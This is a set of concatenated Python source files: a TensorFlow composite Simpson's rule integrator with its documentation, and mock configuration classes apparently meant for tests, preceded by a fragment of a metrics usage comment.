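#
#   from sawtooth_validator import metrics
#
#   metrics.init_metrics(level=metrics.INFO, registry=some_registry)
#   COLLECTOR = metrics.get_collector(__name__)
#   requests_counter = COLLECTOR.counter("requests_handled")
#   requests_counter.inc()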
|
py | b40036f1c08fc2d3d7f94d33c064dac99038407b | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Composite Simpson's algorithm for numeric integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def simpson(func, lower, upper, num_points=1001, dtype=None, name=None):
"""Evaluates definite integral using composite Simpson's 1/3 rule.
Integrates `func` using composite Simpson's 1/3 rule [1].
  Evaluates the function on an evenly spaced grid of `num_points` points,
  then uses the obtained values to interpolate `func` with quadratic
  polynomials and integrates those polynomials.
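  Concretely, with `dx = (upper - lower) / (num_points - 1)` and grid points
  `x_0, ..., x_n` (where `n = num_points - 1` is even), the estimate is
  `dx / 3 * (f(x_0) + 4 f(x_1) + 2 f(x_2) + ... + 2 f(x_{n-2}) + 4 f(x_{n-1}) + f(x_n))`.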
## References
[1] Weisstein, Eric W. "Simpson's Rule." From MathWorld - A Wolfram Web
Resource. http://mathworld.wolfram.com/SimpsonsRule.html
## Example
```python
f = lambda x: x*x
a = tf.constant(0.0)
b = tf.constant(3.0)
  simpson(f, a, b, num_points=1001)  # 9.0
```
Args:
func: Python callable representing a function to be integrated. It must be a
callable of a single `Tensor` parameter and return a `Tensor` of the same
      shape and dtype as its input. It will be called with a `Tensor` of shape
`lower.shape + [n]` (where n is integer number of points) and of the same
`dtype` as `lower`.
lower: `Tensor` or Python float representing the lower limits of
integration. `func` will be integrated between each pair of points defined
by `lower` and `upper`.
upper: `Tensor` of the same shape and dtype as `lower` or Python float
      representing the upper limits of integration.
num_points: Scalar int32 `Tensor`. Number of points at which function `func`
will be evaluated. Must be odd and at least 3.
Default value: 1001.
dtype: Optional `tf.Dtype`. If supplied, the dtype for the `lower` and
`upper`. Result will have the same dtype.
Default value: None which maps to dtype of `lower`.
name: Python str. The name to give to the ops created by this function.
Default value: None which maps to 'integrate_simpson_composite'.
Returns:
`Tensor` of shape `func_batch_shape + limits_batch_shape`, containing
value of the definite integral.
"""
with tf.compat.v1.name_scope(
name, default_name='integrate_simpson_composite', values=[lower, upper]):
lower = tf.convert_to_tensor(lower, dtype=dtype, name='lower')
dtype = lower.dtype
upper = tf.convert_to_tensor(upper, dtype=dtype, name='upper')
num_points = tf.convert_to_tensor(
num_points, dtype=tf.int32, name='num_points')
assertions = [
tf.debugging.assert_greater_equal(num_points, 3),
tf.debugging.assert_equal(num_points % 2, 1),
]
with tf.compat.v1.control_dependencies(assertions):
dx = (upper - lower) / (tf.cast(num_points, dtype=dtype) - 1)
dx_expand = tf.expand_dims(dx, -1)
lower_exp = tf.expand_dims(lower, -1)
grid = lower_exp + dx_expand * tf.cast(tf.range(num_points), dtype=dtype)
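      # Composite Simpson's 1/3 rule weights: [1, 4, 2, 4, ..., 2, 4, 1]; the
      # integral estimate is dx / 3 times the weighted sum of function values.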
weights_first = tf.constant([1.0], dtype=dtype)
weights_mid = tf.tile(
tf.constant([4.0, 2.0], dtype=dtype), [(num_points - 3) // 2])
weights_last = tf.constant([4.0, 1.0], dtype=dtype)
weights = tf.concat([weights_first, weights_mid, weights_last], axis=0)
return tf.reduce_sum(func(grid) * weights, axis=-1) * dx / 3
|
py | b4003723c380ec76b54490a5b2bf7b4a23a814e8 | #!/usr/bin/python3
class MockComponent:
def __init__(self, name, config):
self._name = name
self._config = config
@property
def name(self):
return self._name
def get(self, key, raw=False, fallback=None):
return self._config.get(key, fallback)
def get_list(self, key, fallback=None, split=","):
fallback = fallback or []
raw = self.get(key, None)
if raw:
return [value.strip() for value in raw.split(split)]
return fallback
def __iter__(self):
return iter(self._config)
def __contains__(self, item):
return item in self._config
def __getitem__(self, key):
return self.get(key)
class MockConfig:
def __init__(self, config):
self._config = config
def keys(self):
"""Get a list of component names provided by a configuration."""
return self._config.keys()
def items(self):
# return _CachedComponentIterator(self._config.sections(), self)
pass
def get(self, component):
"""Get a specific component to operate on"""
config = self._config.get(component)
if config is not None:
return MockComponent(component, config)
return None
def __iter__(self):
return iter(self._config)
def __contains__(self, item):
return item in self._config
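# Illustrative usage with hypothetical data, showing how the mocks imitate a
# parsed configuration file:
#
#   config = MockConfig({"web": {"hosts": "a.example, b.example", "port": "80"}})
#   component = config.get("web")
#   component.get("port")        # -> "80"
#   component.get_list("hosts")  # -> ["a.example", "b.example"]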
|